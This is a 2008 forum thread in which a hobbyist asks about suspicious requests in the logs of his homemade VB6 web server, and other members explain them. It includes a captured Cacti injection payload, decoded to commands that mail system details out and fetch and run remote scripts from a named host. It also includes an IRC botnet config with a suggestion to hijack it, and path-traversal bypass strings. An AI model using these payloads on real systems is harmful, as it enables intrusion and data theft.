Is somone trying to hax0r my site?

Ringo · February 06, 2008, 12:22 AM

So, i wrote some little vb6 web server awhile back to convert binary data to html pages for d2 players to view, but i noticed today i had the following requests, and am just wundering if anyone knows what they are trying to do? lol

Quote
[01:14:00] [Client 0] Querying: \cacti\cmd.php

[05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\
2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR
(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101,
116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109,
112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99,
97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46,
50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32,
47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32,
45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46,
47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111

[05:41:13] Connection From 69.42.162.18:18613
[05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log

What are they trying to do? hax it?

Sry if this is wrong forum, just interested to know what they think they are going to accomplish.

edit: Just converted that mumbo jumbo char's to a string and got the following:

Code Select


/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out;
cat /tmp/out | mail -s XX.X.XX.XXX hacked [email protected];wget www.alexutz.as.ro/t -O /tmp/t;
chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log

Lol
Aside, XX.X.XX.XXX was my ip

[Kp edit: broke up the command line. It broke the table.]

Barabajagal · February 06, 2008, 01:09 AM

You should send them an E-Mail telling them to try again, but this time do it right.

Ringo · February 06, 2008, 12:57 PM

lol
Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log?
I get the jist they were trying to get my server to email them of success, but i have almost no exp with web server software (hence wrote my own) but surely it cant be that easy to hax a site?
All they got from me was "Page can not be found" heh

iago · February 06, 2008, 01:17 PM

That looks like a totally automated attack, unless you actually have "cmd.php".. probably somebody scanning random IP ranges.

Ringo · February 06, 2008, 01:34 PM

ah, Cool, nothing to worry about then. (nah i dont have any php files, idk any php)
They also tryed it the day before i think, because i forgot to add error handling for opening files, because my server crashed with the run time error "bad file number or name"

thx for info

Kp · February 06, 2008, 06:21 PM

I concur, that looks automated. It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address. It would then download additional code using wget and execute that. That command line requires tools that're standard on Unix systems, but they're not standard on Windows.

The content of that suntzu.log would be whatever was printed by the Perl script. Someone would have to download the script and examine it to find out what it prints.

As an aside, whoever wrote that wasn't very good. There's no need to create so many temporary files.

Ringo · February 06, 2008, 08:06 PM

Ah

To bad for them I guess, that sounds kinda lame

Thx for info, at least I know what they were up to now

Im gonner put some funny text for them in \cacti\cmd.php just incase they do it again.

mynameistmp · February 06, 2008, 09:45 PM

If you want to know more, i'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.

iago · February 10, 2008, 01:58 AM

Quote from: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, i'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.

You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor).

Newby · February 10, 2008, 11:03 PM

Mmm, tmp is awesome.

Ringo · February 11, 2008, 03:23 AM

Hm, I got another strange one today (seem to get this one alot)

Code Select


[09:04:11] Connection From 67.19.246.130:29261
[09:04:11] Item Drop Rate Pages Updated In 32ms
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg


[09:04:11] [Client 1] Connection Closed.

Im guessing this one is automated as well, and is some kind of configeration file?
Would it be wise for me to IP ban clients that request files from \cacti\ and \cgi-bin\?
I was a little worryed one day somone will request \Project1.vbp

(so i moved the source code)

Newby · February 11, 2008, 03:58 PM

Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp (so i moved the source code)

I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy.

Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"

Ringo · February 11, 2008, 04:37 PM

Quote from: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp (so i moved the source code)
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"

Haha, i just tryed with iexporer and got:

Code Select

[22:11:38] [Client 0] Querying: \test.txt
Then tryed it from a program i was useing to open pages to view html with, and got:

Code Select

[22:26:30] [Client 0] Querying: \..\test.txt
and in the requesting program:

Code Select


[22:26:30] HTTP/1.1 200 OK
Date: Mon, 11 Feb 2008 22:26:30
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

OMFG this is a test
LOL

So, yeah, you could have back pathed to that file

Not any more tho.

I was wundering the other day if its possible to back path, wow lol.
Thanks for bringing that to my attention

Is there any other way to back path like that?

iago · February 11, 2008, 05:34 PM

If you're removing ../, make sure you also pick up the unicode variations and malformed versions (ie, does .%00./ work? Does ...///../// work? Does ..%ff/ work?

There have been countless problems like that plaguing IIS over the years.

Ringo · February 11, 2008, 06:58 PM

ooch, thanks
Atm im just nurfing it like this:

Code Select


    strFilePath = Replace(strFilePath, "/", "\")
    strFilePath = Replace(strFilePath, "..", "")
    strFilePath = Replace(strFilePath, "\\", "\")
    If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    ElseIf IsValidFile(strFilePath) = False Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    End If

IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one)
Im guessing it would be a good idea, next time my cpu is idle, to brute force the dir() function and log any succesfull backpathing?

Is somone trying to hax0r my site?

Barabajagal